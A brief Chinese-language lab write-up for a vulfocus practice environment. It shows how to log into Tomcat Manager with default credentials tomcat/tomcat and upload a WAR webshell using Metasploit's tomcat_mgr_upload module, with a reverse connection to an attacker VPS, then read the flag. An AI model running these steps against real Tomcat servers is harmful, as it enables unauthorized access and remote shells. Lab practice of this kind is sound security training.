背景:
Zab Tomcat是Apache 軟件基金會(Apache Software Foundation)的Jakarta 項目中的一個核心項目,由Apache、Sun 和其他一些公司及個人共同開發而成。 通過弱口令登錄后台,部署war包geshell。
漏洞編號:
影響版本:
弱口令
復現步驟:
1,打開漏洞環境vulfocus
2,訪問URL點擊Manager App
3,驗證弱口令,輸入默認賬號密碼tomcat tomcat
4,使用msf進入exploit/multi/http/tomcat_mgr_upload模塊
5,依次設置
set rhost vulfocus.fofa.so
set rport 60231
set httpusername tomcat
set httppassword tomcat
set lhost VPS IP
set lport 6666
6,run
7,查看flag
